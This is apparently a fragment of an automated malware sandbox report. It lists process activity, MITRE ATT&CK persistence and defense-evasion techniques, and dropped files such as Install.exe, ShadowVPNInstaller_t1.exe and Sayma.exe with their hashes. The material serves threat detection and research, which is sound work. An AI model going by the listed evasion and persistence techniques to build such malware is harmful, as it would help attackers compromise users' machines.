C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Change Default File Association (1)
- Registry Run Keys / Startup Folder (2)
- New Service (1)
- Scheduled Task (1)
- BITS Jobs (1)
Defense Evasion
- Modify Registry (7)
- Disabling Security Tools (3)
- Virtualization/Sandbox Evasion (1)
- File Permissions Modification (1)
- BITS Jobs (1)
- Install Root Certificate (1)
Downloads
34f8ed66eca16cc312795ffbd9b5d8f3
SHA1e83bfe61b9251e58016137baf6d3bdee5fd8a37e
SHA2565480d9d8193700dfa31817e4755e3d2615b1c07f38421b19575051f03ba504c5
SHA51232003a0cf752c1bd0066f45858f3d765da3c0a0076639f6aaeb3dc0f0bb1e122a78979ca2c4d0e0fea2b7fc93078ad0c50cf2e1aa8651d59c3f122015142350e
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exeMD5
34f8ed66eca16cc312795ffbd9b5d8f3
SHA1e83bfe61b9251e58016137baf6d3bdee5fd8a37e
SHA2565480d9d8193700dfa31817e4755e3d2615b1c07f38421b19575051f03ba504c5
SHA51232003a0cf752c1bd0066f45858f3d765da3c0a0076639f6aaeb3dc0f0bb1e122a78979ca2c4d0e0fea2b7fc93078ad0c50cf2e1aa8651d59c3f122015142350e
-
C:\Users\Admin\AppData\Local\Temp\Install.EXEMD5
a3789c9b2a0bde3b59c7612879f8c9d4
SHA1a938c3009fcccaedd361ac52c6f53667c60fc82f
SHA256f338e5a346c8a6b3234270fc6e31e9232a37f80e18df9702f7dcf06dffeb969a
SHA51265255c566dcb5b441c1cd9e7a42400b3158bbc7ae8bfadcc76ecc0a75d6d75ac2be3fc03985afd9b7c9b08c2993564d9b4f52fd6896eeb8fa157be57822e4718
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exeMD5
34b7ddc72dbcb4f28b0afe195c3999a0
SHA1bdf7943073bc597bc9d6c8c563a814c8f3e7d302
SHA25628eb457779d8486975e5cba89c100e934387b9c231aa90920effe1b6498d6d8c
SHA51260f192ce11782d5ba849a684a92bcf136204df3ad7a804b5c3bea63ab946b85d1d543bb56b8d296694575352d305802d56963593f18cc94e65e75b547bb186f3
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exeMD5
34b7ddc72dbcb4f28b0afe195c3999a0
SHA1bdf7943073bc597bc9d6c8c563a814c8f3e7d302
SHA25628eb457779d8486975e5cba89c100e934387b9c231aa90920effe1b6498d6d8c
SHA51260f192ce11782d5ba849a684a92bcf136204df3ad7a804b5c3bea63ab946b85d1d543bb56b8d296694575352d305802d56963593f18cc94e65e75b547bb186f3
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exeMD5
9817a5df2c2b96fb61dbb3f6e651454b
SHA1805684c42ba72268ecd50a40d375b0105fd6ca34
SHA256339bd9d2f34045362351b411cc3e43669aecb1d274a39c57ded6fae8493977f9
SHA51201edf90787c3951aef48a8ebce55602d0e4d92f7d16f9676280b5c48272c76a8167d887f31fdf106ac6006ca3d938626822c13f4dd9b3ea3f78368a506e4c94f
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exeMD5
9817a5df2c2b96fb61dbb3f6e651454b
SHA1805684c42ba72268ecd50a40d375b0105fd6ca34
SHA256339bd9d2f34045362351b411cc3e43669aecb1d274a39c57ded6fae8493977f9
SHA51201edf90787c3951aef48a8ebce55602d0e4d92f7d16f9676280b5c48272c76a8167d887f31fdf106ac6006ca3d938626822c13f4dd9b3ea3f78368a506e4c94f
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\inst3.exeMD5
20cfa83a75bd66501690bbe0ed14bfcd
SHA178585666bbfd350888c5c765b74872be01b85248
SHA256b8cf9f3f5230b901fd2606a3a7e03d3a956494bf73c74244d9581c18a029b36b
SHA5124aefed7006811bb9ecf5e3d5b3afba93ca9c3ebac74390e1f8bd7c2e9796f1b2dbb5641ee8fbd580d1ea02b5146e38aff724de520f8ad6bb1ee707b48842b78f
-
C:\Users\Admin\AppData\Local\Temp\inst3.exeMD5
20cfa83a75bd66501690bbe0ed14bfcd
SHA178585666bbfd350888c5c765b74872be01b85248
SHA256b8cf9f3f5230b901fd2606a3a7e03d3a956494bf73c74244d9581c18a029b36b
SHA5124aefed7006811bb9ecf5e3d5b3afba93ca9c3ebac74390e1f8bd7c2e9796f1b2dbb5641ee8fbd580d1ea02b5146e38aff724de520f8ad6bb1ee707b48842b78f
-
C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exeMD5
d44564ed5b429fa241b22b72d335ddf2
SHA1fe36b8634b0ba2ea44e7c9a3b9b7bdd91ff1b8a3
SHA25660fc735e538df37616ed6c24f4d3a356330336ad14b3b75d45960b19e2a611d2
SHA512bdaad78035e0794048e4d2ffa21a144c031cff13937a6bf626f2578214a087bc8af0c5217fae16ca5022031d17d7ccf86b11259400915585c51fa5401bc1f676
-
C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exeMD5
d44564ed5b429fa241b22b72d335ddf2
SHA1fe36b8634b0ba2ea44e7c9a3b9b7bdd91ff1b8a3
SHA25660fc735e538df37616ed6c24f4d3a356330336ad14b3b75d45960b19e2a611d2
SHA512bdaad78035e0794048e4d2ffa21a144c031cff13937a6bf626f2578214a087bc8af0c5217fae16ca5022031d17d7ccf86b11259400915585c51fa5401bc1f676
-
C:\Users\Admin\AppData\Local\Temp\is-332AK.tmp\Wed15fbd6ef41b4f.tmpMD5
f39995ceebd91e4fb697750746044ac7
SHA197613ba4b157ed55742e1e03d4c5a9594031cd52
SHA256435fd442eec14e281e47018d4f9e4bbc438ef8179a54e1a838994409b0fe9970
SHA5121bdb43840e274cf443bf1fabd65ff151b6f5c73621cd56f9626360929e7ef4a24a057bce032ac38940eda7c7dca42518a8cb61a7a62cc4b63b26e187a539b4a0
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
806a78822c43fe75f513a13ea570c2ad
SHA10c1ce7ddc3f60355b39af922930e3d38ac17860a
SHA2565f1a8d576cdd014c9c5aad6106eba7020e860f38e76ae39c46b04f2f42315e5d
SHA51272f18f5dbbaab3c287e1bb65b0ace71fe90abb6343d2d3117ace530813574aa2492055f6a61ce13cdaf6807e8e2fb43f916eb62e53b4eedaac3691fb25a03e4f
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
806a78822c43fe75f513a13ea570c2ad
SHA10c1ce7ddc3f60355b39af922930e3d38ac17860a
SHA2565f1a8d576cdd014c9c5aad6106eba7020e860f38e76ae39c46b04f2f42315e5d
SHA51272f18f5dbbaab3c287e1bb65b0ace71fe90abb6343d2d3117ace530813574aa2492055f6a61ce13cdaf6807e8e2fb43f916eb62e53b4eedaac3691fb25a03e4f
-
C:\Users\Admin\AppData\Roaming\1631231.scrMD5
854da75bb7c809976f70999a49f6f037
SHA1897b7466ed6a49af14438a6f1b237e4d452ec69f
SHA25622700f36673c2568d67c4f4eadc431f1eeffe5203a64cf65c6f0281bfa140967
SHA51234fe16dfe82557dca6eccdcbd2692d4ebafdec7e1ec16c1350aafc0053dc449a14e3110b0b4f9307c7f22de8e0bc15188b8da8874a4c7207020c4c9d4e44f912
-
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-